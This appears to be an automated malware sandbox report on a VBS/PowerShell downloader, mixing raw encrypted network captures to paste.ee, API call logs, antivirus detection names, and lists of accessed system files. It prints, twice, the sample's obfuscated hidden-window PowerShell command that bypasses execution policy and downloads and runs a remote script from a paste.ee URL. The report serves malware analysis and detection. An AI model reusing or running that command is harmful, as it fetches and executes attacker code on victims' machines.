R40v0*†HÎ=+"bóts§h‹`®C¸5Ł0{KIûÁaÎæÞF½kÕa5®@Ýs÷‰‘0Zë<î…|¢@v;©Æ¸GØ*璑jsé±r9Ÿ)Ÿ¢˜Ó_^X†e¡„eÑ܋ÉÇsȌj/åÄ«ÑŠ£ÿ0ü0Uÿ†0U%0++0Uÿ0ÿ0U€LÖëtÿI6£ÕØüµ>Åjð”Œ0U#0€`{fE —ʉP/}Í4¨ÿüýK06+*0(0&+0†http://i.pki.goog/gsr1.crt0-U&0$0"   †http://c.pki.goog/r/gsr1.crl0U  0 0g 0  *†H†÷  ‚B»Ö‡–ã?c ¤¡hH 9"sžøËN-1éŸç ¡Ò6„¬yëé°ëj¶{ }t¸›e«h*,,ÝBýÆq χ-÷kÈn}Vâ#XXù%º…G×– ý ¶Œà.®UÑyu5,1[?e¼Íœ‡B§‘±›^Žñ»Ê-Gð¬c~†¿ÖäkÓÖÓŽŠgX¸ÿ÷¦„ IP[?: % ò‹\ÓyW6‚Îÿ&·©ñ™í­‚>ÈnëÓ<8ÀAšá^SÏ> Wëîâ?H¥ñ¾Ñj# û?/¢µ½ên£FÎ.g¯3&˜ªÕKÒ©6Å&;[‹ˆÁå
Data received ‘
Data received AØÔ«{€[̼ræ¼1$ñÁåʚb¡ff*µ˜'§ y ?\ýgôG‹éž †Æà‰Ú¯‚À3EA ¡`Ð*F0D |ºÃ:+íøŸ×ý»À%¯hÌ5[”’êù±‰a Y€w=)š4E®/ț^w5‘øë×!ҞÅé
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received zæl‚wq @÷âÜÙFÛýìlFÝÑë~ÄdÂ*ìßíÐ€øj¸/x
Data received p
Data received ©è <Å º8ÀSÛ%ò"N$JÑRuý$”:ÂMvÿӔ¢ €íiW^¯ŠKñʙì¯g*¡[y>¯ÛÀä˜@SÈëœsr+ Hi£˜£Aàû/«0ìü]¿*{QUÐl$:J eŠÞMˆÖbU_dú±pØÐ"³;Ëa²Ù­8E¼ñd…{RØXÏ»óª01‚-xl*]TŠ|a̦z ܕ ®Rå³äpc>Øh¹¬›ãy­÷v>áï|‡ ˜ýò€ÚöjH~Ê,1g'0Ö Å´×ˆŒ@èÂd<=]}ènJ@ˆ š%pð÷Ý2Ž®-›v©öÞ¨nÿT%Õ j"F댱f瓇…gi¤]!aÔa7çjh8B£}Å#<Œ£Œ"¸ ˆA·k@žã '·2Ë+6Õx 7¤¨ÇeÙT©„!ݸO¼ök|u–&‹óиATâÊÝùÂv²€uñÒçw+¿T©"u®lYð#<Q²©I¶åû'HÀ¼O»î½Úðy Â`ž¶êéÁ™Ÿ+Ñ|ÅÙåGóD‚Úu 2xPêÁ 2ÑqÊPäb-ŸA5 ‹EõïÇWÑ}ëRžÂ¦äS*"¥á|¦‹Jp´¼¡Bç$«ÝCúÃÚН̣ýÂ;ϒ{ԋ3Õ:²òá†?Ô®úqe0«àRÇ£,½º}ÍníR`’“ƒñîô³²}%úêþ™ÁÜ©e‚¹Ch~ 8ï`̺êÕo&`é`O²{Ú-'öë8r.â R <¾–EK nšþ½»‘<.qvTqâέþ‹¤«bzˆ©¤õˆâ²Ñö„“T½Sh¤‘5#~Äðô^0ô‹RT#8Õ¶éÕL:tKW ïnìf,½ÌþcµµßÆëuü"%w¤à½¨×÷ئlúÃ3®šÌâȺ·„ÛÙ £ø{OE«ì(¢ÔSè«Tj#CýiÍ_Æ m‚(':ÐfìC¥N‘T· OB˜Ÿƒ%p´­&>ërµ`ëÚsi5sÁrZ‚q|Þ؅‘Û½qüªÔ}¡b¥Ý’û=M|Ì&OGoŠ^mlC]ÃøöÂ`…!—:|‹¬ì¥Æ=M¨x$†!H‡ý#Á±å«}a¶–•ô¿áÕ&TH?|€þ"Wºà#’òÚmÚà£ÖòN‡ {…MÄKÛ7Ð:×ÏTµ3¶ÓIeû•ò ‰pä>·­*‹»#¾²¯ML±™€Câl£‹‘H.áŒñ°á5“åŽrmĸ*K.ؗ÷ÔÀþüÂ$Ï)šÚKÕÁ¤²ŸC¶ BDC@è¾cRŸ«¼ÐC »yσ“ ¢l4ÿ˜3£T¹ÏmÍ 'ƒd,ßàÅX¾dŠ °;«™ÄͽûE8mþ0Rmª™0±‰ŽÂBÇ(!<²U\8Ÿ³pÛw.äs®ðP¹/ïR¾,›Ä,ÕG{B”¿¤z±YAÁò ñMAã±7ì\j¾--§(ã47轚­îßHÌÈ1eT^ö¡¥Óp3R>))mõ}›â¬¶ —QÛ©÷¿?©?|Õº;{<0”Ù8¦Ø;¸¼ ë—ɬz“B w Me@ß´ª(#9iŸô¤Ŋ#^ ì“m‚YDå†M>&…Ãö)¬Ù<È8ÐnÍ'Àˆ¥qJޅºìz÷¥a®1Cm4Ò¿þkƒ”`²«d0UéÆ·^Hà›$·ä8Þ83´‡Fà[JzvKY”ÐÀŸ0n‡i#Cù6Ò xïÐkÓãK#€-ßǸ1£_°YÓÍèÓÉD±~Œñ€Â£Ðäœ14# ³
Data received >°#…Ÿ¦¶E  •W䃣<O¯eze»B$Ø,Z­Ýëˆð‘”3f1 Œ›LoËþ0}Ý!Õ<|Xš9/²!oډ…Üú£ŽĜwš›šôŸþ¼6ÁWv0X’6«{¬Ž˜‘ö&f·þő ª5crÒ2÷‚®ãµ~ߕƴ&Xb :<ȍÓÈ^ ¯ BH’RU1w3ޝ/»òì)Óê½coéÑqyf¼ff÷ÝoõÊÑJ¸Š´lú)œX.²NÉ\F9£ŽèÀ¬žÒ(.>®´±Üó"68«M…å†aÄ47f§•Í<ò:}”ÚΡËBçT9ƒm‘)>º}¢;UáØkw!ƒÉƒv9Ƽ“.Kö† :<W¥iì_zvP ‹—|Vtû:AÍAoðvèV,V+ñظ¶#¥Ruýrãl~ tÜÕLKVè'Uán1+˜e?íŽpì{˶ Ö&iàςƒSC9ˆÎ×]Q܉?Þ:IZU(£²VëÃ2Àà•¾-ù2$AõŒÁ© 'ˆL·äYÇ/aš9mò ¦Ÿ¸_{ l͞PBð•zf_}S Ïö´ 7¯ÉPñô˜¤nèýUe­ ZÄôs\4yi)«§ß£ñIJ’æyÿÁoÞáÅ)1;õݖL^ÁŠÂ¦¡*-µc&wRÒ^õsX{Msù;1&¡ª *. t´*¯SÆ {ý¥ÍNN‹hd<̀€ÿIЦÛB{ô׊Pi ˜e»Ç¾ß«=Á…q˸#ȼDµœÔìÉ 2FڒêWq>ÒñÐZ糍‹ª¹ý6·’ŠÅZÜì¢×k^$Yë®;óŒvA;«^—%*íÿhˆ5Ÿx>˜}cÑví øpó嗛~Fv›á^§VÐvLº ÂýŸÝVN·h—lúÊh‰ß÷!Ðí÷ Ù%­b”»Æ^tڊaÍZ—E΃ÊW¸ôÊÑ49¼rŒõžê—Þü[^HõI‘¢PÑûSeÍ$[AêíÑ­¤qêÂôÑÕπšéoóIVèìq07Ê©‡©üÎ>ω÷Òm o•[¨å ŸIãU°¹]¾¬¤FÉÁ´+Èxó÷aÁË!V¡=yeu©>ÀŸé@•óúÑG*- ØiȽ¦Sÿaè䤡•S%]8¹¿ ä‘ÛoqZ€š™O%T#S,ADÍJl“]’l ºù+ …\T¦=ýœ¬¯Kï{G'=x‹÷\ ‡Ì ·n²Öí$’[ÁÇ­š(â2ü+©5–ÍI7ã¡1ÃñS—wMÐníq ÑÎF:\>^ ®ù4ÿR$²„Œ!ý†å@ö*âJpe!Bß 4KQ‡«ðUã½rYq¶ Cé‡ø¦ˆŒJr|d1¤?XË*¤ð_ °+週ÿ„jLjºÔ!#)ˆ†Îj_;b½1±’mÐѳ\ã<hl†šr¥½Mƶ[x/|qnm9ö³ýêåؘ·Ûù(^þÿkGŸrº­–¦¬MNáÓÁû™›P}‹ÐÜ´ $]sâÒÿ}ÜÒ¡®½µ±:Æ 6»ÆÀP´a¤¨Þ,4Õc›Ü*MK•f©ÏŽ†Iò>v}»@Uv† \fMü)1ÄAÀ̟*f¶D ë=Itþ„!(¦â‡Aäö­€qpÄÖJ&ǽÂt›æi‰}óå9øWò%ÍvsjŒý–JóŸ={qéԍJ:cØßÙÖ-<$⮫¾7™ —Ýo0¹o™ÐJ ؀Ö½yM–8׌ö±[aTƒ;‰4îÝ5ìáNE#k,9…ãàô½WÛ·"
Data received ­°ð¦ëÊ §z§üîO¨y|?ÍìÆ;e ê½Õ÷õË-î1ï×¥˜ ‡”ÔÁd˔‘s³QZ1š\ýÖ 0ÚÝGë[Ä™iMR¿rÎÄ=_±-v» Tø°K˜ÁÛ´‚Ç¡.ÙF³.9ÔRìÆf•ò"4™{f`„Ú"‹ÆŽa Bu|0x}‰ „à,Gó}š–Ö`ÖD”>-PÀr•”Íó•õÚUMpÝYÛêUÈÒ¢¯HÐÜô“¯h›Bì¼Dê?kü2p†LÏõAa´Fæªóª8Ø"ˆeŽµ}âS·ž8ËÃêQV¬T¿m5š—ƒ¶óÔ:¶.kʃ߸!@w.$'^Ohêîçµ[e¡ç÷4öÐ]Œ•©}‹ÓÆjÄ[€!•cj´Â«äÐç=‚eÖ:MYAӗìs9Jëvˏa¢DG'¦"€ ‚¦r_mY¹Áêçí@A±4ãèf"J²|Æä©F.œ_À3P¸ßo]üp–ík"Tt³9s‘k—ª›ª1Í…-ƒQ>t¬ë¦äˆJf.Ò©ä7ymô1é'6leˆOä® Nà1}y±MB-ØT4vÀŒmÅwgXqiÒá†ÌOxr„§NŒ™’¢ËÔEÿf¥yF*€ç„fƐû¹Þþ'\0,btÈDõs>C̲›áò˜@t~œt¿0ã-õ½27æßsïwC§›™C·#·©ì˜샞 u½ÈK.@V:Ý*}VŒŒ\݌ШMˆñvìƒ ïÃÏ5O5©P3Ä³èïº-õGOý>`› aãä!Nþ̝—ܪvøÚ¿2ß;iZ¶_ŸþVR‚dÉû¹iŠô2å£Ûd/¡ýHÍܐwÖ@ßíç`D±WMZnD—Q’L\í}•7 Wr5¯dð¯_ß:QI*Pe ê¸SK$“Ž² ÖÄMòK°`T5…X¬ÜâùҜ~ӄ.üŸø¾Ýºœk¹z°Ni9|Ê~a<E›[,é¬Ù$;;b§8%ëŽLªÎ5óAëù$ ­ºp(.·Š52þX˜‹ãû.£ã2£a`†Âm1Dé ãáì+çÍE^Ã2+1¾ŠDàH?ñb€Ì vñÀ%õÇ$y}*g|~חTþ6ß:¸c´>@ó‚]¥Äƒ¬Ho+rbüpM}J…’úvޅ,iqà®—ƒ©Á™ó,¡åt.í‡@MGh=ïÎzqä#‚˜¬ˆ—E®Sƒc*r—“l?ðfpü;žŸp¡ƒx~ÒëŸÊT“{Heì²{x@J+ìTh\ïryWoº-µõwšÙµ5²y¹rb(-`)ÕyÉú¼Ó°ì Xv(÷ðl[#+0>öŠPh “ðBéEŒÖÞóX˜,.‘óuYc#"sB`<…T-ói¹Ôõ T:,#ž‘©Oµ½Å“áOEـéöZv­G+Ÿªjä:Œ[¹ªCÅQ ÜÀëž¡Ò¹7ãn’eÝÆPô¶¨Œm¥è?šÍ£Oñ`û0¿5¼À±ÚÀB\;à&úür›J•>y°+ڬˣ´Õ(£~hñ@• ùb6"ly!¼›ú€kt!äWnÞö€ {÷t˜0ô>Xà§øъÄÖ}ýW>LI¦7a³h"°.ù˜)è@>K[ÁªF3hqj‡¦=/1ndíLÉöœèïs±Ö 1@–™C$—3ߐg‰@l©Ù҉nÀä¡éDe¦‚PºÖ«,ô&ˆÌ·×›-¡{K´påmÀ€Ä#‰Ynˆ¯ŒÒQ›'E®
Data received 
Data received Õ¿e5¿¡c×|Cýpë¹íƒÁØðüexÔãÜ+uÕ¥¿±VµjñÑ.ï&÷òд‡Rþ/l ¸îDŸÅ«Ò»V8'?”Ú0f:I«¬»wýygšCJÇä,°;ìbûIr Xøs”U¹³MÍj;X¹x¨±^gÃ<Žpz]cÿõ¡Š€œ„~Z‰wÁ(‹—ëûÊ<í•eb›ú?œ-´92F‡G2@…e´—¡©qÀÄ4ÄwÙsm[#åbɨÃûe4)þU#SYDX柜º`»ú{Å[rc,Wº>?Ì1Ìnícþ·³µó4ëƸ ó¦þÇüÃvó+9Bۂ¥ËÀ'IEw“>h[7IJÞü‚¿/*wPä^ZDÝQ°øõÈ]W-ŒØë¤Z-‹Né½2¾¬­7˜¬øR¥<2êP°”ÌoôáøMÿ1ű7\´ RǏl -œûöÞ×+ÌåÅaÐpqðîâêËY<rü'ÖÑ/Þ .=[­Ô~x*"‚Ùªg¶ržB‚zŸ[*ÓËN8Ë£/ lFϒÉ2û}3´B¿T„„+Ý6›dç‚·Ž&ïžÒÜjÀ"¸¼úÌ[/r5sV❴ Q˜ ²ôƒ|[¢vÌ7LÆ3é…xnôn;YB5Ÿo‡éz½bÄíÝÃæg$´ö¶ž9j’>×*Ü^<—¼WÚ9àÏ/¯tñ$z&ÒA¸.L•Þk-ñT“²^— {â j?½¢(ÒFE»%ÈK;ãã)7aÝ)8\Z(5JµGåð$Ö÷íÅøÌË.÷ã÷a¯lxQin3àOºíð|n‘’ž?^ü2¤ÂÙEkýKðòüõ3½À!iî¦fRÌjÁ“®ÝY‘'"”;‚äÁ“y_íƒ?dè…V¾¸Ö§#팝1:r;Íý…«+ý½9T½ˆxdw"òČ^.I•)Ò+Ì#åö‘ôO+æ@eWÄû÷ˆ¦° aÐ6ç¾x0êg®zSׄ#ªÈÑ×mrÉ츆.VöïÉõB0,ÕzÍl¨"Ý µ(nfËÏfü'ê15Mc½’GÏÞûèR ¥*ªÃ D™ …Ö@bÕM-N»–!¿y ž8€¿SØk'&}ŸÛ:F@ð¸/Ùh¨0Î'ðæ•À¼hxö¼ÆÝьñ¢Ø™f7çÄi`†‘Àe¢‰þ†C
Data received 
Data received û­DéÌՠԅà±Ûø”àë–2¼ÅTø[t&}r)Œ°
Data sent kgf§LÉúvÄiž5W2 ˆ7ƒ)%1øQvÁn‰•aƒë/5 ÀÀÀ À 28&ÿ paste.ee  
Data sent FBAl3aý˜@@óÎ.¢ØˆŽ^˜Ô5Þ5ßdòˆ×Õö ÞRU/G‡i[mœ¦l=3DÒ\ÙÑ+uÎFÏ÷XjBXôG0§Xµ)cü’¹. ¹oÀKˆÞŒFŠæÝ¥CãÌ2ñÀ„üFt“‡™4í­À
Data sent `¾Gjé‚BG&n·‹Ño·þÇ;·,ä鐧™³+,â¥èKðÝ0v‹s,Ö@¹{ËtceºSn`4 ØßkÝW‰i´…~’× LÏ ,n¹­È!¶æœªÙWb¾JþG
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Symantec ISB.Downloader!gen80
ESET-NOD32 PowerShell/Runner.A suspicious
Avast Script:SNH-gen [PUP]
Kaspersky HEUR:Trojan.VBS.Alien.gen
Rising PUF.Runner/PS!8.188C4 (TOPIS:E0:V57SxEang5G)
Ikarus Trojan.PowerShell.Agent
Google Detected
Microsoft Trojan:VBS/Obfuse.RTDF!MTB
ZoneAlarm HEUR:Trojan.VBS.Alien.gen
Varist VBS/Agent.BOL!Eldorado
huorong TrojanDownloader/PS.NetLoader.fk
AVG Script:SNH-gen [PUP]
Time & API Arguments Status Return Repeated

send

buffer: kgf§LÉúvÄiž5W2 ˆ7ƒ)%1øQvÁn‰•aƒë/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 1396
sent: 112
1 112 0

send

buffer: FBAl3aý˜@@óÎ.¢ØˆŽ^˜Ô5Þ5ßdòˆ×Õö ÞRU/G‡i[mœ¦l=3DÒ\ÙÑ+uÎFÏ÷XjBXôG0§Xµ)cü’¹. ¹oÀKˆÞŒFŠæÝ¥CãÌ2ñÀ„üFt“‡™4í­À
socket: 1396
sent: 134
1 134 0

send

buffer: `¾Gjé‚BG&n·‹Ño·þÇ;·,ä鐧™³+,â¥èKðÝ0v‹s,Ö@¹{ËtceºSn`4 ØßkÝW‰i´…~’× LÏ ,n¹­È!¶æœªÙWb¾JþG
socket: 1396
sent: 101
1 101 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process wscript.exe martian_process Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe